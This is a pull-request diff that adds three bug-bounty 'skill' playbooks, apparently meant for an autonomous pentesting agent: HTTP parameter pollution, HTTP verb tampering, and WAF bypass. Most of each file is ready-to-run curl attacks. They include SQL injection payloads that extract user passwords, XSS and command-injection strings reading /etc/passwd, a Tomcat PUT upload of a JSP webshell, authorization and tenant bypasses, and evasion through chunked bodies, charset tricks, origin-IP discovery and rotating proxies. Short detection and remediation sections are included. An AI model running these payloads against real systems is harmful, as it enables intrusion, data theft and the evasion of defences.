### PR TITLE
feat(skills): subdomain-takeover + HPP/verb-tampering/WAF-bypass bug-bounty playbooks

### DIFF
--- a/packages/decepticon/decepticon/skills/standard/exploit/web/hpp/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/web/hpp/SKILL.md
@@ -1,0 +1,189 @@
+---
+name: hpp
+description: "HTTP Parameter Pollution — parser discrepancies between proxy/server/app, WAF bypass, auth/ACL bypass, injection delivery."
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: execution
+  when_to_use: "HPP, HTTP parameter pollution, duplicate parameters, parameter precedence, WAF bypass via dup params, parser discrepancy, ?a=1&a=2"
+  tags: hpp, parser-discrepancy, waf-bypass, auth-bypass
+  mitre_attack: T1190
+---
+
+# HTTP Parameter Pollution (HPP)
+
+Two layers (proxy/WAF, framework, app code) parse the same duplicate parameter **differently**. The WAF inspects one value, the app reads another — payload slips through. Or the framework picks one value for the auth check and a different one for the action — ACL bypass. Standalone severity is usually Low/Medium; chained into SQLi / SSRF / auth bypass it is High/Critical.
+
+## 1. Parser precedence table
+
+When `?id=1&id=2` (or duplicated body params) is received:
+
+| Stack | `request.GET['id']` / equivalent | `getParameterValues` / list view |
+|---|---|---|
+| PHP (`$_GET`) | **last** wins (`2`) | `$_GET['id[]']` only; otherwise the dup is dropped |
+| ASP.NET (`Request.QueryString["id"]`) | **comma-concatenated** (`"1,2"`) | `GetValues` returns both |
+| ASP Classic | **comma-concatenated** | — |
+| Java Servlet (`getParameter`) | **first** (`1`) | `getParameterValues` returns both |
+| Java Spring `@RequestParam String` | **first** | `List<String>` binds both |
+| Node.js `qs` (Express default) | **array** (`["1","2"]`) | n/a |
+| Node.js `querystring` (legacy) | **array** | n/a |
+| Python Flask `request.args.get` | **first** | `getlist` returns both |
+| Python Django `request.GET['id']` | **last** | `getlist` returns both |
+| Python `urllib.parse.parse_qs` | **list** (`["1","2"]`) | — |
+| Ruby on Rails | **last** | `params[:id]` is the last; arrays via `id[]=` |
+| Go `net/http` `r.URL.Query().Get` | **first** | `["id"]` returns all |
+| Perl CGI `param("id")` | **first** in scalar, **list** in list context | — |
+| nginx `$arg_id` | **first** | — |
+| Apache mod_rewrite `%{QUERY_STRING}` | raw — passes both | — |
+| AWS API Gateway → Lambda proxy | **last** in `queryStringParameters`, all in `multiValueQueryStringParameters` | — |
+| Cloudflare WAF | inspects **all** values for rule match (generally) | — |
+| AWS WAF | inspects each occurrence | — |
+| ModSecurity (CRS) | inspects each — but anomaly score per rule | — |
+
+The exploitable pattern: **WAF/proxy reads value A, app reads value B**.
+
+## 2. Detection
+
+```bash
+# Baseline
+curl -s "http://<TARGET>/api?id=1" -o /dev/null -w 'HTTP %{http_code} %{size_download}B\n'
+
+# Duplicate param — same key
+curl -s "http://<TARGET>/api?id=1&id=2" -o resp.dup -w 'HTTP %{http_code} %{size_download}B\n'
+cat resp.dup | head -c 300
+
+# Bracket form (PHP arrays)
+curl -s "http://<TARGET>/api?id[]=1&id[]=2" -o resp.arr -w 'HTTP %{http_code} %{size_download}B\n'
+
+# Whitespace / separator variants
+curl -s "http://<TARGET>/api?id=1;id=2"           # semicolon separator (PHP/Java differ)
+curl -s "http://<TARGET>/api?id=1&id =2"          # space-before-=
+curl -s --data-urlencode 'id=1' --data-urlencode 'id=2' "http://<TARGET>/api"  # body dup
+```
+
+Reflection check — does the response echo `1`, `2`, `1,2`, or `["1","2"]`? That literally fingerprints the stack.
+
+```bash
+for pair in 'id=1&id=2' 'id=2&id=1' 'id=1;id=2' 'id[]=1&id[]=2'; do
+  echo "== $pair =="
+  curl -s "http://<TARGET>/echo?$pair"
+  echo
+done
+```
+
+## 3. WAF bypass via duplicate parameters
+
+The WAF inspects one occurrence; the app concatenates / picks the other.
+
+```bash
+# ASP.NET: WAF sees "1" on first occurrence, app gets "1,UNION SELECT ..." after concat
+curl -G "http://<TARGET>/search" \
+  --data-urlencode "q=1" \
+  --data-urlencode "q=UNION SELECT user,password FROM users--"
+
+# PHP last-wins: WAF blocks the obvious payload only if it inspects every value
+curl -G "http://<TARGET>/search" \
+  --data-urlencode "q=harmless" \
+  --data-urlencode "q=<svg/onload=alert(1)>"
+
+# Java first-wins, WAF inspects only the LAST occurrence (some appliances do)
+curl -G "http://<TARGET>/cmd" \
+  --data-urlencode "host=' OR 1=1--" \
+  --data-urlencode "host=8.8.8.8"
+```
+
+Mixed source confusion — GET vs POST:
+
+```bash
+# Some frameworks merge GET+POST into one params dict; precedence differs from WAF inspection
+curl -X POST "http://<TARGET>/api?role=user" \
+  -H 'Content-Type: application/x-www-form-urlencoded' \
+  --data 'role=admin'
+```
+
+## 4. Server-side HPP — auth / ACL bypass
+
+The auth layer evaluates one value; the controller acts on another.
+
+```bash
+# Pattern: filter reads first, action reads last
+curl "http://<TARGET>/transfer?account=mine&account=victim&amount=100"
+# Filter: account==mine → permits. Controller: last wins → operates on victim.
+
+# Role check vs role assignment
+curl -X POST "http://<TARGET>/users/create" \
+  -d 'role=user&username=x&role=admin'
+
+# Tenant scoping
+curl "http://<TARGET>/api/orders?tenant_id=$MINE&tenant_id=$OTHER"
+```
+
+## 5. Client-side HPP
+
+User-supplied parameter is **re-emitted into a link or redirect** without re-encoding `&`.
+
+```
+Vulnerable template:  <a href="/proxy?url=USER_INPUT&action=read">
+Payload:              USER_INPUT = http://x.tld?evil=1
+Rendered link:        /proxy?url=http://x.tld?evil=1&action=read
+Server sees:          url=http://x.tld?evil=1   AND   action=read     (still benign)
+
+Now payload: USER_INPUT = http://x.tld?evil=1&action=delete
+Rendered link:        /proxy?url=http://x.tld?evil=1&action=delete&action=read
+Server (first-wins):  action=delete   ← attacker controls flow despite "&action=read" being hard-coded
+```
+
+```bash
+# Probe — pass a payload containing & and look for it un-encoded in the response HTML
+curl -s "http://<TARGET>/page?ref=foo%26admin=1" | grep -oE 'href="[^"]*ref=[^"]*"' | head
+```
+
+## 6. Injection delivery
+
+```bash
+# Split SQLi payload across two values to bypass per-value length / pattern checks
+curl -G "http://<TARGET>/search" \
+  --data-urlencode "q=' UNION SELECT 1,2,3--" \
+  --data-urlencode "q=' UNION SELECT username,password,3 FROM users--"
+# .NET concatenation → final value contains both fragments joined by ","
+
+# Carry an XSS payload past a regex that only checks one occurrence
+curl -G "http://<TARGET>/view" \
+  --data-urlencode "name=harmless" \
+  --data-urlencode "name=<img src=x onerror=alert(1)>"
+```
+
+## 7. Tools
+
+- **Burp Param Miner** — finds hidden / undocumented params, reflects, dup-detection.
+- **HTTPParameterPollution** Burp extension — generates dup-permutations.
+- **wfuzz / ffuf** — fuzz with `-z list,1-2-1,1` to inject duplicate keys.
+- **sqlmap** `--param-del=';'` `-p 'q'` `--skip-urlencode` — for separator-style HPP.
+- Hand-rolled Python: `requests.PreparedRequest` lets you pass a list of tuples to keep order: `[("id","1"),("id","2")]`.
+
+## 8. Detection signatures (defenders)
+
+| Signal | Source |
+|---|---|
+| Two `id=` (or any key) per request line | access logs, request audit |
+| WAF rule fired on one occurrence, request still 200 | WAF + app log correlation |
+| `?key[]=` or `;key=` patterns | nginx / Apache logs |
+| ASP.NET request that concatenates user input into `"1,2"` and forwards to a backend | app trace |
+| Differential outcome on `?a=1&a=2` vs `?a=2&a=1` | active monitoring probe |
+
+Remediation: canonicalize duplicates **before** auth/inspection; reject duplicates by policy on sensitive endpoints; never re-emit user input into URLs without re-encoding `&` and `=`.
+
+## 9. Decision gate
+
+| Observation | Action |
+|---|---|
+| Stack identified, dup-param accepted, app reads value B while WAF inspects A | Confirm with a known-blocked payload split across A,B → escalate to SQLi/XSS chain |
+| Auth-relevant param accepted in duplicate AND backend action uses a different occurrence | Pursue ACL/IDOR-via-HPP chain → high severity |
+| Dup accepted but both occurrences inspected and treated identically | Low impact, move on or fold into bypass research |
+| Client-side HPP only (no auth/ACL impact) | Document, often Low; chain with open redirect / CSRF |
+
+## Cross-references
+
+- WAF bypass payload obfuscation: `skills/standard/exploit/web/waf-bypass/SKILL.md`
+- SQLi chain: `skills/standard/exploit/web/sqli/SKILL.md`
+- BFLA / IDOR via param shadowing: `skills/standard/exploit/web/bfla/SKILL.md`
+- HTTP smuggling (related parser-discrepancy class): `skills/standard/exploit/web/smuggling/SKILL.md`

--- a/packages/decepticon/decepticon/skills/standard/exploit/web/verb-tampering/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/web/verb-tampering/SKILL.md
@@ -1,0 +1,184 @@
+---
+name: verb-tampering
+description: "HTTP verb/method tampering — auth bypass via HEAD/OPTIONS/arbitrary methods, X-HTTP-Method-Override, TRACE/PUT/DELETE exposure, framework routing flaws."
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: execution
+  when_to_use: "HTTP verb tampering, method tampering, HEAD bypass, OPTIONS bypass, X-HTTP-Method-Override, X-Method-Override, TRACE, PUT, DELETE, PATCH, method-based authorization, BFLA via method"
+  tags: verb-tampering, method-tampering, auth-bypass, bfla
+  mitre_attack: T1190
+---
+
+# HTTP Verb / Method Tampering
+
+Authorization is enforced for `GET`/`POST` but **not** for `HEAD`, `OPTIONS`, `PATCH`, `DELETE`, `PUT`, `TRACE`, `TRACK`, or arbitrary verbs like `FOO`. Or the app respects `X-HTTP-Method-Override` and the WAF/auth filter does not. Or the framework routes any verb to the same handler while only the `POST` ACL rule exists. Severity is High to Critical when it grants admin-only actions or reads protected data.
+
+## 1. Why it works
+
+- Apache/nginx `Limit`/`LimitExcept` rules in `.htaccess` often list only `GET POST`. Any other verb is unrestricted.
+- Tomcat / JSP `<security-constraint><http-method>GET</http-method>` only constrains the listed verbs (the famous "Tomcat verb tampering" class — CVE-2017-12615, CVE-2009-3548 family).
+- API gateways enforce method-specific policies; the upstream service treats verbs identically.
+- Spring `@RequestMapping` without `method=` accepts every verb. `@GetMapping`/`@PostMapping` constrain, but generic mappings do not.
+- Express.js `app.all(path, handler)` answers every method.
+- Framework method-override middleware (`methodOverride` in Express, Rails `_method=DELETE`, `X-HTTP-Method-Override` in many) lets a `POST` *become* a `DELETE` after auth runs.
+- Many WAFs ship rule sets keyed on `GET`/`POST` only.
+
+## 2. Detection — does the endpoint answer non-standard verbs?
+
+```bash
+# Verb sweep
+for m in GET HEAD POST PUT PATCH DELETE OPTIONS TRACE TRACK CONNECT PROPFIND COPY MOVE LOCK UNLOCK MKCOL FOO; do
+  code=$(curl -sk -o /dev/null -w '%{http_code} %{size_download}' -X "$m" "http://<TARGET>/admin/users")
+  printf '%-10s -> %s\n' "$m" "$code"
+done
+
+# Compare auth-required endpoint without creds, per verb
+for m in GET HEAD POST PUT PATCH DELETE OPTIONS; do
+  curl -sk -o /dev/null -w "%-7s %{http_code}\n" -X "$m" "http://<TARGET>/admin/secret"
+done
+# If GET=401 but HEAD/OPTIONS=200 → verb-based auth bypass candidate.
+```
+
+`HEAD` is the highest-yield: per RFC 9110 it MUST be treated like `GET` minus the body, but servers diverge — middleware sometimes short-circuits auth on `HEAD`. Response headers and status leak data even with no body.
+
+```bash
+# HEAD bypass — read protected response headers (Set-Cookie, Location, ETag, Content-Length)
+curl -sk -I -X HEAD "http://<TARGET>/admin/export.csv"
+```
+
+## 3. Method-override headers
+
+The app overrides the real method with the value of a header **after** the WAF/auth has classified the request as `POST` (allowed) or `GET` (allowed).
+
+```bash
+# Common override headers
+for h in 'X-HTTP-Method-Override' 'X-HTTP-Method' 'X-Method-Override' 'X-Original-Method'; do
+  curl -sk -X POST -H "$h: DELETE" "http://<TARGET>/admin/users/1337" \
+    -o /dev/null -w "%-26s %{http_code}\n" -H "Cookie: session=$LOWPRIV"
+done
+
+# Rails / Laravel — _method in form body
+curl -sk -X POST "http://<TARGET>/posts/42" \
+  -H 'Content-Type: application/x-www-form-urlencoded' \
+  --data '_method=DELETE' -b "session=$LOWPRIV"
+
+# Verb tunnelled through GET (some legacy frameworks)
+curl -sk "http://<TARGET>/admin/delete?_method=DELETE&id=42" -b "session=$LOWPRIV"
+```
+
+## 4. Bypass patterns
+
+| Pattern | Mechanic |
+|---|---|
+| `.htaccess` Limit | `<Limit GET POST>require valid-user</Limit>` blocks GET/POST only — try `HEAD`, `PUT`, custom verb. |
+| Tomcat `<http-method>` constraint | The constraint applies **only** to listed methods. Use any other. |
+| Spring generic `@RequestMapping("/path")` | Every verb routes here. Author meant only `POST`. |
+| Express `app.all` / no method-guard | Same. |
+| Method-override after auth | `POST /low-priv` allowed; `X-HTTP-Method-Override: DELETE` upgrades. |
+| `_method=PATCH` body field | Rails/Laravel/Symfony idiom; the auth layer saw a POST. |
+| WAF gating on `GET`/`POST` only | Send the payload as `PATCH` or `FOO`. |
+| TRACE/TRACK enabled | XST — reflects request headers, used to read HttpOnly cookies in legacy XSS chains. |
+| WebDAV verbs (`PROPFIND`, `COPY`, `MOVE`, `PUT`, `MKCOL`) on IIS/Apache | Direct file upload / RCE on misconfigured WebDAV. |
+| `OPTIONS *` | Discloses enabled methods on the whole server: `curl -X OPTIONS -i http://<TARGET>/* | grep -i allow`. |
+
+## 5. Exploit PoCs
+
+### 5.1 Admin action via HEAD bypass
+
+```bash
+# Trigger admin action where HEAD reaches handler logic without auth
+curl -sk -I -X HEAD "http://<TARGET>/admin/cache/flush" -o /dev/null -w '%{http_code}\n'
+# Confirm side-effect:
+curl -sk "http://<TARGET>/api/cache/size"
+```
+
+### 5.2 Method-override DELETE
+
+```bash
+# Low-priv user can POST. Override flips to DELETE on a record they shouldn't touch.
+curl -sk -X POST "http://<TARGET>/api/v1/users/9001" \
+  -H 'X-HTTP-Method-Override: DELETE' \
+  -H "Authorization: Bearer $LOWPRIV_JWT" -i
+```
+
+### 5.3 Tomcat PUT → JSP webshell (CVE-2017-12615 family)
+
+```bash
+curl -sk -X PUT "http://<TARGET>/uploads/shell.jsp/" \
+  --data-binary @shell.jsp -H 'Content-Type: application/octet-stream' -i
+# Trailing slash on the URI defeats the JSP filter on vulnerable Tomcats.
+curl -sk "http://<TARGET>/uploads/shell.jsp?cmd=id"
+```
+
+### 5.4 OPTIONS leak + CORS pivot
+
+```bash
+curl -sk -X OPTIONS "http://<TARGET>/api/admin" -i | grep -iE 'allow|access-control-allow-methods'
+# Use any listed method that bypasses auth in step 2.
+```
+
+### 5.5 TRACE / XST
+
+```bash
+curl -sk -X TRACE "http://<TARGET>/" -H 'X-Stolen: cookie-via-XSS' -i
+# If TRACE echoes the request, XST chain with reflected XSS can read HttpOnly cookies.
+```
+
+### 5.6 Arbitrary verb
+
+```bash
+# Some servers route ANY method to the same handler — including FOO/BAR.
+curl -sk -X FOO "http://<TARGET>/admin/users" -i
+```
+
+## 6. Chains
+
+| Chain | Mechanic |
+|---|---|
+| **BFLA / IDOR** | Object scoping checked on `GET`, missing on `DELETE`/`PUT` — delete or modify other tenants' resources. |
+| **Privilege escalation** | `POST /users` allowed → `X-HTTP-Method-Override: PUT` to overwrite `role=admin`. |
+| **Mass-assignment** | `PATCH` accepted where `POST` is parameter-filtered — submit hidden fields. |
+| **WAF bypass** | Whole rule sets attached only to `GET`/`POST`. Re-issue payload as `PATCH`. |
+| **File RCE** | WebDAV `PUT`/`PROPFIND`/`MOVE` on IIS/Tomcat → write executable into web root. |
+| **XST** | `TRACE` + reflected XSS → exfil HttpOnly cookies (now mostly mitigated by browsers, but still credible in custom clients). |
+| **OPSEC noise reduction** | `HEAD` produces no response body — quieter scanning than `GET`. |
+
+## 7. Tools
+
+- Burp Suite — Repeater "Change request method", Intruder verb-payload list, **HTTP Method Interchange** extension.
+- `nuclei -t http/misconfiguration/http-method-tampering*` / `http/misconfiguration/trace-method.yaml`.
+- `nikto -Tuning 6` — method/file checks.
+- `httpx -methods GET,POST,PUT,DELETE,PATCH,OPTIONS,HEAD,TRACE -path /admin -mc 200,302`.
+- `davtest` / `cadaver` for WebDAV.
+- `ffuf -X PATCH` etc. — fuzz every endpoint with each method.
+
+## 8. Detection signatures (defenders)
+
+| Signal | Source |
+|---|---|
+| Non-standard verbs in access logs (`PATCH`, `TRACE`, `FOO`) | nginx / Apache logs |
+| `X-HTTP-Method-Override` header present and request body indicates state-change | WAF / reverse proxy logs |
+| `OPTIONS` requests with `Origin` from outside CORS allowlist returning 2xx | API gateway logs |
+| Successful `HEAD` on a `GET-401` path | correlation rule |
+| Auth filter sees method `POST`, handler logs method `DELETE` | app telemetry |
+| `TRACE`/`TRACK` enabled at all | config audit |
+
+Remediation: enforce auth before method routing; treat `HEAD` as `GET` for auth purposes; ignore method-override headers unless explicitly required; allowlist methods per route (`405` everything else); disable `TRACE`/`TRACK`/unused WebDAV verbs at the server.
+
+## 9. Decision gate
+
+| Observation | Action |
+|---|---|
+| Verb sweep shows divergent status on protected path | Confirm with a state-changing PoC, escalate |
+| `X-HTTP-Method-Override` flips the action | Chain to BFLA/IDOR/mass-assignment |
+| Only response-size difference, no auth bypass | Low — fold into recon |
+| `TRACE` echoes but no reflected XSS available | Note for chaining, do not over-report |
+| PUT/WebDAV writes a file under web root | Critical, jump to RCE chain |
+
+## Cross-references
+
+- BFLA / object-level auth: `skills/standard/exploit/web/bfla/SKILL.md`
+- Mass-assignment: `skills/standard/exploit/web/mass-assignment/SKILL.md`
+- HPP (sister parser-discrepancy class): `skills/standard/exploit/web/hpp/SKILL.md`
+- WAF bypass: `skills/standard/exploit/web/waf-bypass/SKILL.md`
+- File upload / WebDAV RCE: `skills/standard/exploit/web/file-upload/SKILL.md`

--- a/packages/decepticon/decepticon/skills/standard/exploit/web/waf-bypass/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/exploit/web/waf-bypass/SKILL.md
@@ -1,0 +1,239 @@
+---
+name: waf-bypass
+description: "WAF evasion — payload obfuscation, HTTP-level evasion, origin-IP discovery, rate/anomaly evasion, per-WAF notes (Cloudflare/Akamai/AWS WAF/ModSecurity)."
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: execution
+  when_to_use: "WAF bypass, WAF evasion, Cloudflare bypass, Akamai bypass, AWS WAF bypass, ModSecurity bypass, payload obfuscation, origin IP discovery, chunked bypass, content-type bypass"
+  tags: waf-bypass, evasion, cloudflare, akamai, aws-waf, modsecurity, opsec
+  mitre_attack: T1027
+---
+
+# WAF Bypass / Evasion
+
+A WAF is a signature + score engine in front of the origin. Bypass goals: (a) deliver a payload the rule set does not match, (b) reach the origin directly so the WAF is out of band, or (c) keep request rate / anomaly score under thresholds while exfiltrating. OPSEC: this skill is for authorized scope. Stay within rate limits the program allows; never test live customer flows; mark traffic with a researcher header where the program asks for it (`X-Bug-Bounty: <HANDLE>`).
+
+## 1. Recon first — fingerprint the WAF
+
+See `skills/standard/recon/web-recon/waf-detection/SKILL.md`. Without a fingerprint you are guessing. Quick:
+
+```bash
+wafw00f -a "https://<TARGET>"
+curl -sI "https://<TARGET>/?id=1' OR '1'='1" | grep -iE 'server|cf-ray|x-amzn|akamai|x-sucuri|x-cdn|set-cookie'
+nuclei -u "https://<TARGET>" -t http/technologies/waf-detect.yaml
+```
+
+Note the **stack**: WAF vendor, CDN, origin web server, application framework. Each layer has its own parser — bypasses live in the gaps.
+
+## 2. Payload obfuscation
+
+| Layer | Technique | Example |
+|---|---|---|
+| Case | Mixed case on keywords (most modern WAFs are case-insensitive — try anyway) | `SeLeCt`, `uNiOn` |
+| Whitespace | Tab, FF, CR, LF, `/**/`, `+`, `%a0`, `%0b`, `%0c` between tokens | `UNION/**/SELECT`, `UNION%a0SELECT` |
+| Comments | Inline SQL comments split keywords | `UN/**/ION`, `SEL/*!50000*/ECT` (MySQL versioned) |
+| Encoding | URL-encode, double-URL-encode, unicode, HTML entity, base64 | `%2527`, `%u0027`, `&#39;`, `\x27`, `\u0027` |
+| Mixed encoding | Encode only the bytes the rule looks for | `'%20OR%201=1--` → `%27 OR 1%3D1--` |
+| Alternate syntax (SQL) | `UNION`-less extraction via boolean/blind, `||` concat, JSON path, `CAST`/`CONVERT` chains | `' OR ASCII(SUBSTR(...))>0--` |
+| Alternate syntax (XSS) | Tagless / event-less / template / SVG / MathML | `<svg/onload=alert(1)>`, `<details/open/ontoggle=alert(1)>`, `<style>@import"//x"</style>` |
+| String concat | Break signatures into pieces | `'+'al'+'ert'+'(1)+'`, `concat(0x61,0x64,0x6d,0x69,0x6e)` |
+| Backtick / quote variants | `` `select` ``, `"select"`, `[select]` (MSSQL), `N'admin'` | |
+| Null bytes | `%00` early-terminates many string ops in C-backed parsers | `admin%00.png` |
+| Charset | Submit body in unusual charset; WAF inspects as UTF-8 but app decodes UTF-16 | `Content-Type: ...; charset=utf-16le` |
+| Path normalization | `..;/`, `..%2f`, `..%252f`, `;/`, `//` between segments | `/admin..;/users` |
+
+```bash
+# SQLi rule bypass — split UNION SELECT
+PAYLOAD="-1'/*!50000UnIoN*/(/*!50000SeLeCt*/(group_concat(table_name))FROM(information_schema.tables))-- -"
+curl -sk -G "https://<TARGET>/search" --data-urlencode "q=$PAYLOAD"
+
+# XSS rule bypass — no parens, no "alert"
+curl -sk -G "https://<TARGET>/echo" --data-urlencode 'q=<svg/onload=eval(name)>'
+
+# Cmd-injection rule bypass — IFS for spaces, brace expansion, $@
+curl -sk "https://<TARGET>/ping?host=127.0.0.1\${IFS}\$@cat\${IFS}/etc/passwd"
+```
+
+## 3. HTTP-level evasion
+
+Bypasses that exploit parser differences between WAF and origin.
+
+```bash
+# 3.1 Chunked transfer — WAF disables inspection on chunked bodies (still common)
+curl -sk -X POST "https://<TARGET>/login" \
+  -H 'Transfer-Encoding: chunked' -H 'Content-Type: application/x-www-form-urlencoded' \
+  --data-binary $'1d\r\nusername=admin\'+OR+1=1--\r\n0\r\n\r\n'
+
+# 3.2 Content-Type confusion — WAF parses as form, app parses as JSON (or vice versa)
+curl -sk -X POST "https://<TARGET>/api/login" \
+  -H 'Content-Type: text/plain' \
+  --data '{"user":"admin\" OR 1=1--","pass":"x"}'
+
+# 3.3 Multipart smuggling — payload hidden in a part the WAF does not inspect
+curl -sk -X POST "https://<TARGET>/upload" \
+  -F 'file=@evil.php;type=image/png' \
+  -F 'meta={"role":"admin"};type=application/json'
+
+# 3.4 charset= trick (UTF-7, UTF-16, IBM037)
+curl -sk -X POST "https://<TARGET>/api" \
+  -H 'Content-Type: application/json; charset=ibm037' \
+  --data-binary @ibm037-payload.bin
+
+# 3.5 Host-header / SNI mismatch (origin trusts internal Host, WAF inspects external)
+curl -sk --resolve "internal-admin:443:$ORIGIN_IP" \
+  -H 'Host: internal-admin' "https://internal-admin/admin"
+
+# 3.6 HTTP/2 → HTTP/1 downgrade smuggling (paired with smuggling skill)
+# See skills/standard/exploit/web/smuggling/SKILL.md
+
+# 3.7 Pseudo-header injection in HTTP/2 (h2c upgrade, :path tricks)
+curl -sk --http2-prior-knowledge "https://<TARGET>/" \
+  -H ':path: /admin/../public' -i
+
+# 3.8 Param pollution — WAF inspects first, app reads last (or concat)
+# See skills/standard/exploit/web/hpp/SKILL.md
+```
+
+## 4. Origin-IP discovery — bypass the WAF entirely
+
+If the WAF sits on a CDN edge (Cloudflare, Akamai, Sucuri, Imperva), reaching the origin IP directly with the right `Host` header takes the WAF out of band.
+
+```bash
+# 4.1 Historic DNS / certificate transparency
+curl -s "https://crt.sh/?q=%25.<TARGET>&output=json" | jq -r '.[].name_value' | sort -u
+# Pre-CDN A records often still resolve in passive DNS sources:
+#   securitytrails / shodan / censys / dnsdumpster / viewdns
+shodan search "ssl.cert.subject.cn:<TARGET>"   # finds origin certs presenting CN behind CDN
+shodan search "http.title:'<TARGET>' -org:'Cloudflare,Akamai,Fastly'"
+censys search 'services.tls.certificates.leaf_data.subject.common_name: "<TARGET>"' \
+  --fields services.ip
+
+# 4.2 Subdomain bleed — dev/staging/mail/cpanel rarely fronted by CDN
+subfinder -d <TARGET> -silent | dnsx -resp-only | sort -u
+# Look for non-CDN A records (not in Cloudflare/Akamai/Fastly ASNs)
+mapcidr -cl - < ips.txt | asnmap | grep -viE 'cloudflare|akamai|fastly|imperva|incapsula|sucuri'
+
+# 4.3 SSRF / open redirect / webhook outbound from target
+#   - any target-side fetcher that calls back to attacker leaks origin IP in TCP src
+
+# 4.4 Misconfigured mail (DMARC/SPF/MX) reveals origin mailer IP
+dig +short MX <TARGET>
+dig +short TXT <TARGET>
+
+# 4.5 Validate candidate origin
+curl -sk --resolve "<TARGET>:443:$ORIGIN_IP" "https://<TARGET>/" -o origin.html -w '%{http_code}\n'
+diff <(curl -sk "https://<TARGET>/" | md5sum) <(md5sum < origin.html)
+# Same hash + no WAF headers = origin reached.
+```
+
+Once on the origin, the WAF is **gone**. All bypasses in section 2 are unnecessary.
+
+## 5. Rate / anomaly evasion
+
+WAFs aggregate score per IP / session / fingerprint and throttle when thresholds trip.
+
+| Technique | Notes |
+|---|---|
+| Rotate egress IPs | Proxychains, residential proxies, AWS Lambda fan-out (within scope rules). |
+| Distribute over time | Jitter, exponential backoff, randomized intervals. |
+| Rotate user-agent / Accept-Language / TLS JA3 | curl's `--ja3` (curl-impersonate), or `httpx -random-agent`. |
+| Avoid signature noise | Don't send `sqlmap/1.x` UA. Don't send 200 payloads/sec. |
+| Login-warmed sessions | Authenticated session has its own bucket; one valid request per N payloads keeps anomaly score low. |
+| Slow blind injection | Time-based blind SQLi with 0.5s deltas instead of 10s. |
+| Token-bucket-aware probing | Detect 429 → back off until rate limit resets. |
+
+```bash
+# Distributed slow scan with jitter
+shuf payloads.txt | while read p; do
+  curl -sk -G "https://<TARGET>/search" --data-urlencode "q=$p" \
+    -H "User-Agent: $(shuf -n1 uas.txt)" -x "$(shuf -n1 proxies.txt)" -o /dev/null \
+    -w 'q=%{url_effective}  code=%{http_code}\n'
+  sleep "$(awk 'BEGIN{srand(); print 2+rand()*6}')"
+done
+```
+
+## 6. Per-WAF notes
+
+### Cloudflare
+- Managed Ruleset is signature + ML; payload-obfuscation (sec 2) works well.
+- Bot Fight / Super Bot Fight Mode JA3-fingerprints curl/python — use **curl-impersonate** (`curl_chrome116`) or `requests` via `httpx[http2]` with realistic JA3.
+- `cdn-cgi/trace` confirms you're hitting Cloudflare; absence on a target subdomain often means origin reachable directly.
+- Workers / Pages have weaker default rules than the main reverse proxy.
+- 0.0.0.0/8 or unusual `X-Forwarded-For` is ignored by CF but sometimes trusted at origin → header-trust pivots.
+
+### Akamai (Kona / App & API Protector)
+- ABCK/sensor cookie expected; missing or invalid → 403. Generate with a real browser or sensor-data generators (within scope).
+- AcceptedKeyLength + JA3 fingerprinting.
+- `Pragma: akamai-x-cache-on, akamai-x-get-extracted-values` reveals edge variables on test envs.
+- Common bypass: subdomain not yet onboarded (no Property activated) → no WAF.
+
+### AWS WAF
+- Rule-group based (AWSManagedRulesCommonRuleSet, SQLi, XSS). Each rule has a fixed inspection budget (~8 KB body, ~64 KB on newer plans). Oversize bodies are **skipped** by default — payload after the inspection limit is unfiltered.
+- Inspection cap bypass: pad request body with junk to exceed the inspection limit, place payload after the cap.
+- Region scoping — endpoints in non-WAF regions / shadow API gateways often lack the rule.
+
+```bash
+# AWS WAF body-cap bypass — pad with 9 KB of A's, then payload
+( python3 -c 'print("A"*9000, end="")'; printf '&q=%s' "' UNION SELECT user,password FROM users--" ) \
+  | curl -sk -X POST "https://<TARGET>/search" \
+      -H 'Content-Type: application/x-www-form-urlencoded' --data-binary @-
+```
+
+### ModSecurity + OWASP CRS
+- Anomaly-scoring (Paranoia Level 1–4). PL1 is bypassed by almost all sec-2 tricks.
+- CRS rules are public — read the rule that fires and craft around it. `SecRuleEngine DetectionOnly` is common in early deployments.
+- Charset / Content-Type confusion is highly effective historically.
+- JSON body inspection requires the JSON parser to be enabled — many deployments forget.
+
+### Imperva / Incapsula
+- `incap_ses_*` cookie required; bots without it 403.
+- Has its own rate-limit on `Reputation` score — high-noise scans trip it fast.
+- Bypass focus: origin discovery (sec 4) often easier than payload obfuscation.
+
+### Sucuri
+- Lightweight, signature-heavy. Sec-2 encoding tricks bypass the bulk of rules.
+- `X-Sucuri-Cache` header confirms presence.
+
+## 7. Tools
+
+- **wafw00f**, **whatwaf** — vendor identification.
+- **nuclei** `http/misconfiguration/`, `http/cves/` with `-rate-limit` low.
+- **bypass-firewalls-by-DNS-history** — automates sec 4.1.
+- **CloudFlair** — Cloudflare origin discovery via Censys.
+- **curl-impersonate** / **tlsx** — JA3/JA4 rotation.
+- **Burp** with **Bypass WAF**, **HTTP Smuggler**, **Param Miner**, **Hackvertor** extensions.
+- **sqlmap** `--tamper=between,space2comment,space2randomblank,charunicodeencode,...` (chain tamper scripts per WAF).
+- **ffuf** `-H` rotation, `-p` per-request delay, `-rate` cap.
+
+## 8. Detection signatures (defenders)
+
+| Signal | Source |
+|---|---|
+| `Transfer-Encoding: chunked` on small bodies from unauthenticated IPs | WAF / proxy logs |
+| Body charset = `ibm037`, `utf-16`, `utf-7` on public endpoints | content-type analytics |
+| Request body > inspection cap on AWS WAF + trailing suspicious params | CloudWatch + WAF logs |
+| Sustained low-rate requests from rotating IPs hitting parameterized URLs | rate-limit / WAF analytics |
+| Direct hits to origin IP bypassing CDN | origin firewall logs (only CDN IPs should reach origin) |
+| `Host` header mismatch vs SNI | TLS / app logs |
+| `X-HTTP-Method-Override` paired with payload-like params | WAF custom rule |
+
+Remediation: lock origin firewall to CDN egress ranges only; enable strict-charset / strict-content-type at the edge; raise inspection cap or block oversized unauthenticated bodies; ratchet ModSecurity to PL2+; rotate origin IP after CDN onboarding; enforce JA3/JA4 allowlists where business permits.
+
+## 9. Decision gate
+
+| Observation | Action |
+|---|---|
+| WAF identified, payload blocked, no origin IP yet | Section 2 obfuscation → section 3 HTTP-level → only then chase origin |
+| Origin IP candidate, response identical to CDN-fronted | Confirm with TLS cert + body hash, then re-run all chained skills directly against origin |
